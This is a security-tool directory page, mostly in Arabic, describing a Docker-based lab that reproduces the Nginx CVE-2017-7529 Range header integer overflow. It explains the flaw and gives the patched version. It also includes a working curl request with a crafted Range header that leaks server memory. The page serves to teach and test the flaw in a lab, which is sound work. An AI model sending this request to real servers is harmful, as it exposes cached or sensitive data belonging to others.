Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2017-7529- — بيئة إعادة إنتاج قائمة على Docker لثغرة تجاوز عدد صحيح Nginx CVE-2017-7529، توضح كشف المعلومات عبر رؤوس Range مصممة مع دليل استغلال خطوة بخطوة. | Kitploit
أدوات/GitHubGitHub/youngmin0104/cve-2017-7529-
تحليل الثغرات الأمنيةالاستغلالجمع المعلوماتأمن الويبالتعلم والتعليممختبرات وتدريب عملي
GitHubyoungmin0104/cve-2017-7529-

CVE-2017-7529-

بيئة إعادة إنتاج قائمة على Docker لثغرة تجاوز عدد صحيح Nginx CVE-2017-7529، توضح كشف المعلومات عبر رؤوس Range مصممة مع دليل استغلال خطوة بخطوة.

عرض المستودع
4منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2017-7529-Nginx Range Header Integer Overflow

  • Nginx هو خادم ويب عالي الأداء ومفتوح المصدر يُستخدم على نطاق واسع كخادم ويب ووكيل عكسي وخادم تخزين مؤقت وغير ذلك.

  • في إصدارات Nginx 1.13.2 والإصدارات الأقدم، توجد ثغرة أمنية ناتجة عن تجاوز عدد صحيح (integer overflow) تسمح للمهاجم بالتلاعب برأس Range وكشف أجزاء من الذاكرة أو معلومات حساسة خارج نطاق الاستجابة الأصلي.


Reference

  • https://www.freebuf.com/articles/web/140178.html

تكوين البيئة الضعيفة

  • قم بتشغيل الأمر التالي لبدء بيئة Nginx الضعيفة:
root@kitploit:~
bash
docker compose up -d
  • بعد بدء تشغيل الخادم، يمكنك الوصول إلى العنوان التالي من المتصفح:
root@kitploit:~
arduino
http://your-ip:8080
  • ستظهر صفحة Nginx الافتراضية أو صفحة index.html المخصصة.

إعادة إنتاج الثغرة

  • أرسل طلبًا برأس Range خبيث باستخدام أمر curl:
root@kitploit:~
bash
curl -v -H "Range: bytes=-9223372036854,5" http://your-ip:8080/

-> قد يتضمن نص الاستجابة بيانات ثنائية غريبة أو بقايا ذاكرة بالإضافة إلى جزء من الصفحة.


ملخص مبدأ العمل

  • تحدث هذه الثغرة بسبب تجاوز في عمليات حساب الأعداد الصحيحة الموجبة والسالبة عند معالجة طلبات Range، مما يؤدي إلى تضمين مناطق ذاكرة غير مقصودة في الاستجابة.
  • بذلك يمكن للمهاجم استخراج جزء من البيانات المخزنة مؤقتًا أو معلومات حساسة.

الخلاصة

  • يمكن أن تؤدي هذه الثغرة إلى كشف المعلومات (Information Disclosure) بمجرد طلب HTTP بسيط.

  • إذا كانت البيانات تتضمن معلومات إعدادات حساسة أو أي بيانات قابلة للتسريب، فقد يؤدي ذلك إلى حادث أمني خطير.

  • التصحيح: يُنصح بالتحديث إلى Nginx 1.13.3 أو أحدث.


مثال على بنية الملفات المرجعية

root@kitploit:~
bash

CVE-2017-7529/
├── Dockerfile
├── docker-compose.yml
├── nginx.conf
├── index.html
└── README.md  <-- 본 문서
تنزيل الأداة